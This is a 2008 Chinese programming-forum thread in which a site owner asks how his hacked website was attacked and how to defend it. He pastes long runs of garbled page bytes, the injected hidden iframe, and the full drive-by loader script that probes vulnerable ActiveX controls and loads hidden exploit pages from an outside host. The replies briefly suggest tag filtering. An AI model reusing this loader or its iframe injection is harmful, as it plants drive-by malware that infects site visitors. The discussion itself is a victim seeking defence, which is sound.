我的ssh 网站被攻击,找不到攻击的方法,及如何防御。

dawangzi16 2008-06-11 11:56:11
大家好:

我和几个朋友弄得一个网站, http://www.3qianke.cn 被人攻击了,症状是我点击上面的链接时,页面被跳转了,显示出一堆乱码出来。网上搜索,实在不知道是什么攻击,以前没有遇到过这种情况。。。 请问是什么攻击,我该如何防止。。。。谢谢



被攻击后显示的页面内容为: ?韂{SW?汿?t:=?腃 ツ薶 儽现誮]V奋軧???;沴? ~儘 ??瀣'?蕺L蜀詃'褙朐轌泛%Z#`?u?鳛s罟琰罟窂.Mv肤濋ibZBN6w哰(陂v燊陡莪};}]?隻?厯TAd?蓊躲臬qMK顃:鞪{]?s黪篏1罩O潥オ+狤猷4a? QR6t貑?R?徥茲ψ淣縋T??旛餝湤 ?r魀1?T揻璓J嬎晈VN婟J€f?p?饳,E? S飀糔[MU潄嚦仝ZmVm*?I\粯lf峖0,€4圧憣祮M乶删?牗坃嚑j矑沈D 懟洙0 @繸葨??'@以<語 $3紹,榫セ鏛o鳻G__M??>袴匘懧匲豻(?+N'?繣僘AVAu趱趵柌.a恘J崳愥9临?燵8>?菠)睭S<?*?垬?9k?M栛?f疦?6稂?%觥譼U Dni圧€燯-#5€FSM棃W *p??0犦じ;)'?Q嶦?*?Z$-晍T??斫袇?€擮趝v??揖#紭娐?"??[盻4c使Rl砀4園r?')?n隳S硑)蕍2?_鉙%@锷??U7宯秽躰埻?斷敗⒄鬦d苑 7?s?M?徳埊?(?0@M絇"??鍞Z2禈(G`W*?矺&狫B敢鑠冘菼M(経|)?/'?聯X?SED悋殮?K ??i??t ??.;?o&?6A諿璆蕹' \?`t偄MB辋キ鯆(苚rs?裙? 汄獾Q?8?饍琓p)厯礀l? ?A?KP? ?^譧2枙{vcb?鯐(l6V怷:橅?玥IE?Pu脗?J?蜷笈铴?>%漤獷9瑽弬A?N郔_氂Tu臨2潱=8+赙eQV?"?逡p秛N`k >oJ5貶>c?@]樢袙?燥,_爇狧镘旆a?掉$挤羽??憢0U桕5xIp1 峇N籨 醊 0腗??P@?\.P?=温??"?z;j屏2&堥P崥??v];巛? h驱慉輆?'枾~[胤骪咋瞹?鏎?[?1oEd?Rb蓥?襮h誸pi薺G窒鯆妮 ?馵髥?ah鲇{?20!熁"x妩嵺???h?H?醯L阚`?嶉鸰g鹧HE犛?9%E枫?V秐?陆nu xo鍩v?尋富U?|湆%M矑纁 :ai}%I?S€帯)&?+?A 棻^M艶1駳N?蠾iLqHs(k捝?庴4B6:團?7yRài&t瘀熟鶱艴瀬}?Q$"9#蔬?byE~cJ匹 %S筳?3?戳 MtF菒L笙/?'?n=囼C?衈M梢€抬 -.?RTV6?h9挏HEBVU坎v崀K?檿A峫"?陛em?柮g沰尺禝?醭Qz雵?v*嵙蘡止;?_窷R&痏(?胝Wζ?夡遇? S?縇5祤迦驢Tlp2^馾醰;$酕蹕o繨Z坖q-?iゑ俈#?鼠1萛2?y(?fzp54?Tn/W毜S谒U畡0?9﹢` !區?cX╤QA拹鸭T€襞牯愕?焲?>( 蠬嬕PNH鍹n幵庿?rTp鋁鞅钶匣?舑勁﨏?D烥6?埳n㏒悓:?瑍1鰀骙N劖:艚"咪錮?ヴ屙fh鶍z唻梫刈?hf?:芤3~叐c?o峠鷨?嚫_铜彬燚才v倡?犼襠)6(@..??非鉩k}顚猶Z頕抣滃┞啂嗶R饅g?撆罉,?萌艳ウ2P騋k鴶畯?鮝顕圅?8塟?z:Cg?邶笐:n黼餝,眉袶u础繎!?9Q圛~捴訕輷.苻阩3(>挹鰩焤矋T{赋譕qb2蜺Qr掋-`F???峦嵛pD愨@?Yz篛匊螺?)}筲F籊療#)晲?uN饄#?w1t蕻哩跋鵌b1匸犕憟4?T)?5洈擙j渻慓癪yC 吼?B$儶?曐E圥T宔┴?涢脳萵'嵡)8Jw?^€猂?鴒ST訄+?響 擿畳01!?邹}枷y"6$_WX??:xkt娉?FiDo跦鵻QV丄 秠Eq駩!}7M稗覾抣耚壙豃G%黦d侀€嚛G驗J[Mo'Kc拵??Zu椂?°X}招@耛荓M螵妭?"E[c烁?'?飞d_?釆??#瘞!??C?鬻v?l恢 ?ol銟k軉汀?Fi鐖?}H嵸;辛箶&7鎑蟂zn嘉并"诲3b6 薞猡程:d浒妉|泀?豴隱K7?抌I>?饛S?k





查看了页面源代码是:
<iframe src=http://www.union501.cn/one/a20.htm width=0 height=0></iframe> ? 韂{SW?汿?t: =?腃 ツ薶
儽现誮]V奋軧???;沴? ~ 儘
??瀣'?蕺L蜀詃'褙朐轌泛%Z#`?u?鳛s罟琰罟窂.Mv肤濋ibZBN6w哰(陂v燊陡莪};}]?隻?厯TAd?蓊躲臬qMK顃:鞪{]?s黪篏1罩O潥オ+狤猷4a? QR6t貑?R?徥茲ψ淣縋T?? 旛餝湤 ?r魀1?T揻璓J嬎
晈VN婟J€f?p?饳,E? S飀糔[MU潄嚦仝ZmVm*?I\粯lf峖0,€4圧憣祮M乶删?牗坃嚑j矑沈D 懟洙0 @繸葨??'@以<語 $3紹,榫セ鏛o鳻G__M??>袴匘懧匲豻(?+N'?繣僘AVAu趱趵柌.a恘J 崳愥9临?燵8>?菠)睭S<<?hIv"?趍璶√霥笹醔 .?徃鍜孽$h?zd也U-u7N芄丯骁?:?縫绌?X罡|u晗幍褘?kW?緷踭L}}s蝢玳碚?運??:隶7n?tL帣?q肱怙)(UB鍰!
;叟?袯鮱决f&脏 5讀糒}sKMss堮档讋?,Z堚0P剚宻豃-u鰐{蘏<脽噗躮]??圯拶引V碮郈)0媌W 弐W[_H閲:碢躐L-胷??
詢胡細?{0實鯈 ?N48€麇?u贆睸W穽$X麔盦g庂憘蜰0)梓柂比悵觎j鱡捴?衍=)>?*?垬?9k?M栛?f疦?6稂?%觥譼U
Dni圧€燯-#5€FSM棃W *p??0犦じ;)'?Q嶦?*?Z$-晍T??斫袇?
€擮趝v??揖#紭娐?"??[盻4c使Rl砀4園r?')?n隳S 硑)蕍2?_鉙%@锷??U 7宯秽躰埻?斷敗⒄鬦d苑
7?
s?M?
徳埊?(?0@M絇"??鍞Z2禈(G`W*?矺& 狫B敢鑠冘菼M(経|)?/'?聯<BY谜?肪[|厚谆 [涖咛黕B"6z'?訩?酿洸 餕7???災茾<?ebX鵉鰫摠缧怳謄?卡Oj?
胻?;?*≒)*@柳Itc癃?M?mS;"庶怾鮝N、@??濦Q,4歍???爇qH咰呍TD?0T韁V銽-,E罤鰼恙b ??S| ぉ碼W/ €猆U"驣?鹅V?瑉諈侸u^Q#壐鮏?燯:袧$Юkp?*?趗=翕?:稺梱eU鄅锣G挘摢jH?镍],?滺?tr縜LU飔鬡c艳?颶鳟uV??6;籹@割RL嬬[`6q蒊 ?磝x 楗娋?鵢wfo~H;h珕C裩徖k)`澦(@繒{?,o?{瞑?;;4%vn叅 E?暥?l滔黱齇诚W菌x期宧攼??5鯇肹虽I伨J5?p哼僕;?馮蕲O鈿"r4c€J刉J??椓??祟f}辔鍓k>X?SED悋殮?K
??i??t ?
?.;?o&?6A諿璆蕹'
\?`t偄 MB辋キ鯆(苚rs?裙?
汄獾Q?8?饍琓p)厯礀l? ?A?
KP?
?^譧2枙{vcb?鯐(l6V怷:橅?
玥IE?Pu脗?J?蜷笈铴?>%漤獷9瑽弬A?N郔_氂Tu臨2潱=8+赙eQV?"?逡p秛N`k
>oJ5貶>c?@]樢袙?燥,_爇狧镘旆a?掉$挤羽??憢0U桕5xIp1
峇N籨 醊 0腗??P@?\.P?=温??"?z;j屏2&堥P崥??v];巛? h驱慉輆?'枾~[胤骪咋瞹?
鏎?[?1oEd?Rb蓥?襮h誸pi薺G窒鯆妮
?馵髥?ah鲇{?2 0!熁"x妩嵺???h?H?醯L阚`? 嶉鸰g鹧HE犛?9%E枫?V秐?陆nu xo鍩v?尋富U?|湆%M矑纁 :ai}%I?S€帯)&?+?A 棻^M艶1駳N?蠾iLqHs(k捝?庴4B6:團?7yRài&t瘀熟鶱艴瀬}? Q$"9#蔬 ?byE~cJ匹 %S筳?3?戳 MtF菒L笙/?'?n=囼C?
衈M梢€抬 -.?RTV6?h9挏HEBVU坎v崀K?檿A峫"?陛em?柮g沰尺禝?醭Qz雵?v*嵙蘡止;?_窷R&痏(?胝Wζ?夡遇?
S?縇5祤迦驢Tlp2^馾醰;$酕蹕o繨Z坖q-?iゑ俈#?鼠1萛2?y(?fzp54?Tn/W毜S谒U畡0?9﹢` !區?cX╤QA拹鸭T€襞牯愕?焲?>( 蠬嬕PNH鍹n<qr座躀8'寞齚銄尰? 浃WC}]齐as+珼憥袯8乻?輏p?砉A筌B[F?腽?鬆???9戇? ?酱Q "k殰袐l邎勢?DN齣8饅桔囎l糀付铬?n?埴悯?^y罕秞嶂查nz 歰 G? C?7悧y礜枴?o>隔3挪~'懌y浹?乾5睽岑L迍橍9蒘l?
?N7s?怯
壑?璅o资逷i;3 慍``?pnq鬣怦宙qI鄥醢?懂仼?=WR2Qf聍俘G?A箩H"K]QdY????雳Da1庈zA盺??>幵庿?rTp鋁鞅钶匣?舑勁﨏?D烥6<Eac}f韢碄3梀呲跬5椝鮫??~_c堢?腫茞!迳吾b嬊WZ諪cf涕?w菑鲗(uN帚粼aDY^犡z?[s貓怦?鍩P仮dv?lC?繢g?8B褡D?|躚_煒沑?"旈;琥风G{泽?焆櫆焁竟倍倒鬮鯊?蟔矍i彠鲳C桗肅0Ga为Q???饏柏x羣冭???燊\?踣获p祧?/蚼蚠歔N輾_瀅?薷;5Y
④}Dy??6
⒃?濞 J竨|fqn虢?[犄+&燒嚃,頎qv!齐?
1笞n輄?ha逡桔廤?煩呴y洑緐泓率月涑傧7?}9邾/L啔?婖鵮<?紉j孙~?ˇ<=:Px)竞舶0鱠jam魮g芋颩}]??k,燑漛X跨疬??祟Q$7?g朵e籠齜慙?繝?孇??
#荼绿}?.猧孚焙嫩+牂K\飵J鸏椒/?厐?楽捾z 6券茊_?蝮兖? 縕~?券螁_?颢丰W€?l?仳3苒錼犸棸I?迻?gcy?髉ic}Y??i?廹7姧飍RM?箔婩^ ??爉?~"?J"G<泴盟泂_'悑\坹y?藱豮P'捸g'坻9霁并屦+鯟2€?間4蕂撞(甪?勇i &+bQ紐G于丞h籏?罿?%/?/?
?村@塗|tp逖茓┰伊?澺,慗?[?慗=紂a韃塗栲仳gヽ:给頃?┌tpi黺㏕狚N茳肎%R伓霍恸w%R伓{}~鉵塗犿~<zm狣*衯??嚮K+毦僞寯F弲絬鬀彗?w懪W+铈醈`囹嗍I嚐黙v儹??M堔閣@?酼 ^疲冪惟 诓眒n戎縼&y劥?歾{靼n噍觽伔郕羘?J?輂(l攚/y?K9}唤j=o愬湂矯?萇栺飂鰯揢,?
n粬U6疾釙fxu鶋耬[+圳佖毲g?V6?蘉_鞭怔:倍]殤瀵海 岈~oiBe+,冝亐J;賫nI?薫?嗗仡柝W媸禫撇枙H世鰪 6O?魇鎄6?2G_酓/;急蓎錜 k gx唚0?藑5St缗菘氌*禔cTNK赐?w?肇?m?Y痍g町香瀤?
蛄暝?O痭?骴燠?T
(僵l:闹{_碲?j匿>?埳n㏒悓:?瑍1鰀骙N劖:艚"咪錮?ヴ屙fh鶍z唻梫刈?hf?:芤3~叐c?o峠鷨?嚫_铜彬燚才v倡?犼襠)6(@..??非鉩k}顚猶Z頕抣滃┞啂嗶R饅g?撆罉,?萌艳ウ2P騋k鴶畯?鮝顕圅?8塟?z:Cg?邶笐:n黼餝,眉袶u础繎!?9Q圛~捴訕輷.苻阩3(>挹鰩焤矋T{赋譕qb2蜺Qr掋-`F???峦嵛pD愨@?Yz篛匊螺?)}筲F籊療#)晲?uN饄#?w1t蕻哩跋鵌b1匸犕憟4?T)?5洈擙j渻慓癪yC 吼?B$儶?曐E圥T宔┴?涢脳萵'嵡)8Jw?^€猂?鴒ST訄+?響 擿畳01 !?邹}枷y"6$_WX??:xkt娉?FiDo跦鵻QV丄
秠Eq駩!}7M稗覾抣耚壙豃G%黦d侀€嚛G驗J[Mo'K c拵??Zu椂?°X}招@耛荓M螵妭?"E [c烁?'?飞d_?釆??#瘞!??C?鬻v?l恢
?ol銟k軉汀?Fi鐖?}H嵸;辛箶&7鎑蟂zn嘉并"诲3b6 薞猡程:d浒妉|泀?豴隱K7?抌I>?饛S?k







下面是跳转到的网址的源代码 http://www.union501.cn/one/a20.htm

注意:其中有“我日360” 和 卡巴斯基=shabi 字样

<iframe src=http://wori360.tudou22.cn/14.htm width=100 height=0></iframe>
<iframe src=http://wori360.tudou22.cn/fx.htm width=100 height=0></iframe>
<script language=javascript src=http://wori360.tudou22.cn/real10.js></script>
<script>
var kaspersky="shabi"
var L_czcY_1 = new window["Date"]()
L_czcY_1["setTime"](L_czcY_1["getTime"]() + 3*60*60*1000)
var Jy2$2 = new window["String"](window["document"]["cookie"])
var sX$bhbGk3 = "Cookie1="
var zecKZZ4 = Jy2$2["indexOf"](sX$bhbGk3)
if (zecKZZ4 == -1)
{
window["document"]["cookie"] = "Cookie1=POPWINDOS;expires="+ L_czcY_1["toGMTString"]()
try{if(new window["ActiveXObject"]("GLIEDown.IEDown.1"))window["document"]["write"]('<iframe style=display:none src="http://wori360.tudou22.cn/newlz.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("IERPCtl.IERPCtl.1"))window["document"]["write"]('<iframe style=display:none src="http://wori360.tudou22.cn/real11.htm"></iframe>');}catch(e){}
try{if(new window["ActiveXObject"]("GLCHAT.GLChatCtrl.1"))window["document"]["write"]('<iframe style=display:none src="http://wori360.tudou22.cn/lz.htm"></iframe>');}catch(e){}
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=1;
}
</script>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1611772.js"></script>
...全文
269 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
little06 2008-06-16
  • 打赏
  • 举报
回复
替换掉"<script>" "<"等等的html标签 和javascript标签 就可以了
具体google一下,还不会,再问我
  • 打赏
  • 举报
回复
这个是什么语言,,,,,
whj518 2008-06-15
  • 打赏
  • 举报
回复
替换掉< > ,\等等字符
zhj92lxs 2008-06-15
  • 打赏
  • 举报
回复
呵呵,这个不懂
dawangzi16 2008-06-15
  • 打赏
  • 举报
回复
[Quote=引用 1 楼 little06 的回复:]
很明显的javaScript跨站攻击
在用户输入的地方,没有做Html和javaScript标签的过滤
[/Quote]



请问具体的,过滤哪些标签哈?
安全这块没有经验,谢!
南南北北 2008-06-12
  • 打赏
  • 举报
回复
路过,学习学习。
little06 2008-06-12
  • 打赏
  • 举报
回复
很明显的javaScript跨站攻击
在用户输入的地方,没有做Html和javaScript标签的过滤

67,515

社区成员

发帖
与我相关
我的任务
社区描述
J2EE只是Java企业应用。我们需要一个跨J2SE/WEB/EJB的微容器,保护我们的业务核心组件(中间件),以延续它的生命力,而不是依赖J2SE/J2EE版本。
社区管理员
  • Java EE
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧